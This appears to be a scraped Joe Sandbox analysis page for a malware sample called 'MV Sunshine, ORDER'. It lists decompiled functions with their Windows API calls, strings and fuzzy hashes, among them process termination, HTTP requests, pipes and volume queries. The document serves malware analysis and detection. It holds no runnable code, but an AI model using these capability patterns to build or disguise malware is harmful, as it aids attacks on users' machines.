Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 46838979a6bf481e4e09cfb53bec2aab8c08281ed45ddda560dfae4b42c0eb69
Instruction ID: a7273e61a10b47488e283bb1f6cc550f1e132c8221c3aafd248b3b1757c1de98
Opcode Fuzzy Hash: 46838979a6bf481e4e09cfb53bec2aab8c08281ed45ddda560dfae4b42c0eb69
Instruction Fuzzy Hash: 97016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5

Function 009E568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009E569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009E56B1
GetWindowThreadProcessId.USER32(?,?), ref: 009E56C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E56CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E56D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E56E0

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 0b568bb36dc16b49dc1b0f2f0c8aa2b20061e6266dbe5e1d41b3347878512139
Instruction ID: b3ed2838d224970dd3ab897d21669de177495a8ab29daf76465bffc86e4610f7
Opcode Fuzzy Hash: 0b568bb36dc16b49dc1b0f2f0c8aa2b20061e6266dbe5e1d41b3347878512139
Instruction Fuzzy Hash: CEF01D3264115CBFE7319BA29C0DEAB7A7CEBC6B11F000169FA04E14509AA11A0386B5

Function 009E74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 009E74E5
EnterCriticalSection.KERNEL32(?,?,00991044,?,?), ref: 009E74F6
TerminateThread.KERNEL32(00000000,000001F6,?,00991044,?,?), ref: 009E7503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00991044,?,?), ref: 009E7510

Part of subcall function 009E6ED7: CloseHandle.KERNEL32(00000000,?,009E751D,?,00991044,?,?), ref: 009E6EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 009E7523
LeaveCriticalSection.KERNEL32(?,?,00991044,?,?), ref: 009E752A

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 320d3c6eaae284c4c0ebade1a5c513c69d64745bcd54911e396e9071a0526378
Instruction ID: 6d118d082900d6fe09d57dd1454c53a43cdc333dd0881ec2b14283ffca08b97b
Opcode Fuzzy Hash: 320d3c6eaae284c4c0ebade1a5c513c69d64745bcd54911e396e9071a0526378
Instruction Fuzzy Hash: F1F0547A140716EFD722ABA4FC8CADB7729EF49302B000531F202A14B5CB755813CB60

Function 009D8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 009D8E7F
UnloadUserProfile.USERENV(?,?), ref: 009D8E8B
CloseHandle.KERNEL32(?), ref: 009D8E94
CloseHandle.KERNEL32(?), ref: 009D8E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 009D8EA5
HeapFree.KERNEL32(00000000), ref: 009D8EAC

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: f109efafab58773bbb0a2b621f8c70ffa700fc6e8e91aec7fe8e7a0877dbac57
Instruction ID: f0523ea54fac843d97d24ce1705c4a6e566ef04e40b6161c6682d1d7396013e7
Opcode Fuzzy Hash: f109efafab58773bbb0a2b621f8c70ffa700fc6e8e91aec7fe8e7a0877dbac57
Instruction Fuzzy Hash: 49E0C236004209FFDA119FE1EC0C90ABB79FB89722B108230F329A5870CB329463DB91

Function 009F8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009F8928
CharUpperBuffW.USER32(?,?), ref: 009F8A37
VariantClear.OLEAUT32(?), ref: 009F8BAF

Part of subcall function 009E7804: VariantInit.OLEAUT32(00000000), ref: 009E7844
Part of subcall function 009E7804: VariantCopy.OLEAUT32(00000000,?), ref: 009E784D
Part of subcall function 009E7804: VariantClear.OLEAUT32(00000000), ref: 009E7859

Strings

AUTOIT.ERROR, xrefs: 009F8A3D
Incorrect Parameter format, xrefs: 009F8960, 009F8B22

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 61dfc0e399254b5db9c59fe4f9abb0fc05e28208d7a5fafed962f7ed6c2ade0f
Instruction ID: c2900af28c16861b6203a1387b47147fa53caeffe27cf1fe179d389ee0c9ff2e
Opcode Fuzzy Hash: 61dfc0e399254b5db9c59fe4f9abb0fc05e28208d7a5fafed962f7ed6c2ade0f
Instruction Fuzzy Hash: C2919D716083059FC710EF24C480A6BBBE4EFC9354F04896EF99A8B361DB31E946CB52

Function 009E2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0099FEC6: _wcscpy.LIBCMT ref: 0099FEE9

_memset.LIBCMT ref: 009E3077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009E30A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009E3159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009E3187

Strings

0, xrefs: 009E3063

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 83f3b778df226c2c9a925cb31a5351297ca990ff9f07934a07625f1dfdd343c0
Instruction ID: 1d12844ff9cb8726854a9bfe88d80de5b162a147cc4c17c7b075818e55974944
Opcode Fuzzy Hash: 83f3b778df226c2c9a925cb31a5351297ca990ff9f07934a07625f1dfdd343c0
Instruction Fuzzy Hash: 9851B17160C3809ED726DF2AC849B6BB7E8EF96360F04892DF895D3191DB70CE458792

Function 009DDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009DDAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009DDAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009DDB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009DDB8E

Strings

DllGetClassObject, xrefs: 009DDB01

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 85ce6af24a6c75b9ecdbe186c55a7d35fb3bd825677ade840cbeec991349326a
Instruction ID: 2cebb63cfef1d1083d249c3877dda68f44056702bf0f2e6c5ee2546f714bf77f
Opcode Fuzzy Hash: 85ce6af24a6c75b9ecdbe186c55a7d35fb3bd825677ade840cbeec991349326a
Instruction Fuzzy Hash: 6A419BB1641208EFDB14CF64C884BAABBA9EF48354F11C1ABAD059F305D7B4DA44CBA0

Function 009E2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E2CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009E2CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 009E2D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A46890,00000000), ref: 009E2D5A

Strings

0, xrefs: 009E2CA4

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 3cfd0ffa12c77debba549ff38d164145a64f39ddcb4c2bc8af85fd726d057a92
Instruction ID: 13a64a9090823b66f6d8f543c1ba6064476d78399c212c771fcbe6d42b35e7b7
Opcode Fuzzy Hash: 3cfd0ffa12c77debba549ff38d164145a64f39ddcb4c2bc8af85fd726d057a92
Instruction Fuzzy Hash: 7A419D30204382AFD725DF25DC44B1ABBECAF85320F14465DEA65972E1D770ED45CB92

Function 009FDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009FDAD9

Part of subcall function 009879AB: _memmove.LIBCMT ref: 009879F9

Strings

cdecl, xrefs: 009FDB30
winapi, xrefs: 009FDB4A
stdcall, xrefs: 009FDB5B
none, xrefs: 009FDBB4

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 1cee52fadb448a977046b74a58fb8b69cea7d34fac200c8e97de2380a48109ec
Instruction ID: 6758584daf8de2ce276932ff798930bd6e3159a72859ffd7e877efc6391dc9ff
Opcode Fuzzy Hash: 1cee52fadb448a977046b74a58fb8b69cea7d34fac200c8e97de2380a48109ec
Instruction Fuzzy Hash: 5731907150421AABCF14EF94C881ABEB3B5FF85310B108A29E965A77D1CB71E906CB80

Function 009D9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009D93F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009D9409
SendMessageW.USER32(?,00000189,?,00000000), ref: 009D9439

Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66

Strings

ListBox, xrefs: 009D93B5
ComboBox, xrefs: 009D9380

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: e87a5d078d1d3307eaff56d8299239e580a92d934983da15c52873aa8bdb5dc5
Instruction ID: 9e2b3a069d04d53f284f7bbaf65d8d9f817cdd31d055eb2e251650c5897cafce
Opcode Fuzzy Hash: e87a5d078d1d3307eaff56d8299239e580a92d934983da15c52873aa8bdb5dc5
Instruction Fuzzy Hash: EB21E171940108BEDB14BBB0DC859FFB76CEF85760F10862AF925A73E1DB354A4B9620

Function 009F1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009F1B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009F1B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009F1B96
InternetCloseHandle.WININET(00000000), ref: 009F1BDD

Part of subcall function 009F2777: GetLastError.KERNEL32(?,?,009F1B0B,00000000,00000000,00000001), ref: 009F278C
Part of subcall function 009F2777: SetEvent.KERNEL32(?,?,009F1B0B,00000000,00000000,00000001), ref: 009F27A1

Strings

, xrefs: 009F1B87

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 01b24a08f974e12e9d3335342f3d0911e4ce76e63dc84b04d69ca70ccd46f1c5
Instruction ID: 3bd655578b79a3442d8000810fb0e301fcdce040f5f1bbac9d99031a97549b1c
Opcode Fuzzy Hash: 01b24a08f974e12e9d3335342f3d0911e4ce76e63dc84b04d69ca70ccd46f1c5
Instruction Fuzzy Hash: 4E21CFB150020CFFEB21DF608C85FBF77ECEB89745F10412AF605A6240EB249D0697A1

Function 00A06656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A066D0
LoadLibraryW.KERNEL32(?), ref: 00A066D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A066EC
DestroyWindow.USER32(?), ref: 00A066F4

Strings

SysAnimate32, xrefs: 00A066AB

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: fbc01a091fe9021de400d910640aa4ea63943821ff988ff3e8927f077558457d
Instruction ID: 15130c7ff4d53306dd9c9ccd2bb0bbbf3822aff2db15bf6366ae89ed9ad197ee
Opcode Fuzzy Hash: fbc01a091fe9021de400d910640aa4ea63943821ff988ff3e8927f077558457d
Instruction Fuzzy Hash: C9218E71100209AFEF148FA4EC80EAB77ADEB5936CF104629F911961D0D7728C629760

Function 009E703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 009E705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009E7091
GetStdHandle.KERNEL32(0000000C), ref: 009E70A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009E70DD

Strings

nul, xrefs: 009E70D8

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 30e90f0a51d4090c785731da4cc181e746fa9364a17c62e98d1d82fcd2bd7964
Instruction ID: 407e1e5b1e3bc44532bb899edf0c536316b7022060923f07c5fae2ae799d0e74
Opcode Fuzzy Hash: 30e90f0a51d4090c785731da4cc181e746fa9364a17c62e98d1d82fcd2bd7964
Instruction Fuzzy Hash: 1321AE74504249ABDB219FBADC04B9AB7A8BF54721F204A19FCA0D72D0E7B09D418B51

Function 009E710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009E712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009E715D
GetStdHandle.KERNEL32(000000F6), ref: 009E716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009E71A8

Strings

nul, xrefs: 009E71A3

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 01bb5c8fe8a117cd73641431c68649a547ba24052906ceae0e575b8f80091763
Instruction ID: 1cbe763b510fd52bcb27c243d310d9e678c68fd39085411744a32d104b02b00c
Opcode Fuzzy Hash: 01bb5c8fe8a117cd73641431c68649a547ba24052906ceae0e575b8f80091763
Instruction Fuzzy Hash: 58217475508349ABDB219FAA9C04AA9B7ACAF55730F200A19FDA1E72D0D7709C428762

Function 009EAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009EAEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009EAF13
__swprintf.LIBCMT ref: 009EAF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,00A0F910), ref: 009EAF6A

Strings

%lu, xrefs: 009EAF26

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 7b099ead206249d6ad4e2723c80bbf1bcc2241d01a714b288e86978b39166fa6
Instruction ID: fea02779906b0f4428773545d2b45ec9506d98b6227a8cbbd12105157826fb1b
Opcode Fuzzy Hash: 7b099ead206249d6ad4e2723c80bbf1bcc2241d01a714b288e86978b39166fa6
Instruction Fuzzy Hash: 20216031A00109AFCB10EF65C985EAE7BB8EF89704B004469F909AB351DB71EE42CB61

Function 009DA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66

Part of subcall function 009DA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009DA399
Part of subcall function 009DA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 009DA3AC
Part of subcall function 009DA37C: GetCurrentThreadId.KERNEL32 ref: 009DA3B3
Part of subcall function 009DA37C: AttachThreadInput.USER32(00000000), ref: 009DA3BA

GetFocus.USER32 ref: 009DA554

Part of subcall function 009DA3C5: GetParent.USER32(?), ref: 009DA3D3

GetClassNameW.USER32(?,?,00000100), ref: 009DA59D
EnumChildWindows.USER32(?,009DA615), ref: 009DA5C5
__swprintf.LIBCMT ref: 009DA5DF

Strings

%s%d, xrefs: 009DA5D9

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: db56fb55ec902689420480561b6e7347e5210b30ba69d0860e2bd7d849b31355
Instruction ID: 1a7392fda6d254dfe5716f3b12f07bbbf88d221064552d92f28e610e275e2177
Opcode Fuzzy Hash: db56fb55ec902689420480561b6e7347e5210b30ba69d0860e2bd7d849b31355
Instruction Fuzzy Hash: B211B771240208BBDF10BFB4DC85FEA777DAF88700F048076B908AA292DB7499568B75

Function 009E2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009E2048

Strings

APPEND, xrefs: 009E2081
KEYS, xrefs: 009E205F
EXISTS, xrefs: 009E2070
REMOVE, xrefs: 009E204E

